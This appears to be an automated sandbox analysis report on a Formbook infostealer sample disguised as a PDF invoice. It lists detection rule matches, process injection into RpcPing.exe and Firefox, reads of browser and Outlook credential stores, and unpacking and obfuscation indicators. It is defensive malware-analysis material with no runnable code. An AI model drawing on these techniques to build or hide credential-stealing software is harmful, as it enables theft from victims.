Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, J1Np7SeHlsncQgvjqU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@5/4
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORIGINAL INVOICE COAU7230734298.pdf.exe.log Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\RpcPing.exe File created: C:\Users\user\AppData\Local\Temp\297268BLQ Jump to behavior
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RpcPing.exe, 00000008.00000003.2435255903.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432168414.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2431409420.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432933782.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2431030399.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2432548929.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2929881128.00000000033E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Virustotal: Detection: 38%
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe" Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: credui.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.3682450.2.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.6b70000.4.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.366a230.1.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 8.2.RpcPing.exe.40bcd14.2.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 9.2.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 9.0.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 10.2.firefox.exe.31d5cd14.0.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: 0xAFFFFCB7 [Fri Jul 27 19:12:55 2063 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E9DED push FFFFFF8Bh; iretd 0_2_070E9DEF
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040D0CA push edi; ret 3_2_0040D0CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00416166 pushfd ; iretd 3_2_004161E5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00417984 push esp; iretd 3_2_0041798A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413B46 push eax; iretd 3_2_00413B71
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413B62 push eax; iretd 3_2_00413B71
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00408307 push ds; iretd 3_2_00408309
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00403330 push eax; ret 3_2_00403332
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00415C40 push ebx; ret 3_2_00415C6A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00415C43 push ebx; ret 3_2_00415C6A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00404D23 push esi; retf 3_2_00404D24
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413E4A push edi; retf 3_2_00413E4B
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413F1C push eax; ret 3_2_00413F26
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00417FD0 push esp; ret 3_2_00417FD1
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004187E8 push ebx; ret 3_2_004187E9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E225F pushad ; ret 3_2_019E27F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E27FA pushad ; ret 3_2_019E27F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A109AD push ecx; mov dword ptr [esp], ecx 3_2_01A109B6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E283D push eax; iretd 3_2_019E2858
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E1368 push eax; iretd 3_2_019E1369
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FEB7E push ebx; ret 7_2_036FEBA5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FEB7B push ebx; ret 7_2_036FEBA5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F1242 push ds; iretd 7_2_036F1244
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6005 push edi; ret 7_2_036F6007
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FF0A1 pushfd ; iretd 7_2_036FF120
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_037008BF push esp; iretd 7_2_037008C5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03701723 push ebx; ret 7_2_03701724
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03700F0B push esp; ret 7_2_03700F0C
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03701C14 push cs; retf 7_2_03701C15
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E225F pushad ; ret 8_2_039E27F9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E27FA pushad ; ret 8_2_039E27F9
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: section name: .text entropy: 7.754463700440127
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, VJYMC1jXYO50ycofa1x.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mWGkFufV9U', 'ApFkVrOJRd', 'db9kIA8C0y', 'MfskyfFbUh', 'SwNkMWF7Hm', 'W9mkSjc1P3', 'w8fk69wyFB'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, EAgkxljcSmXysaymPIk.cs High entropy of concatenated method names: 'RoP1fAGoKF', 'v1Z1Jj8y5P', 'naX17cYyaC', 'gFN1m8tX4n', 'yV810gqwt1', 'uQl1bVYa5b', 'Yu41LCWHqT', 'l8v1e51Yig', 'QVR1hE6xBl', 'Prp1OKcjXc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, aCwl6tvb2r4l4lgPk8.cs High entropy of concatenated method names: 'qYc75uL0J', 'TEqmUh9JD', 'c5dbOQ7ig', 'U9iLEsk4w', 'hgQhE9arO', 'iJNOkodQA', 'ON9mMpa2SRwpjNA4RP', 's5oqLfELxjtjsN3BfX', 'mx6ZkEZ02', 'aILkOXd9S'
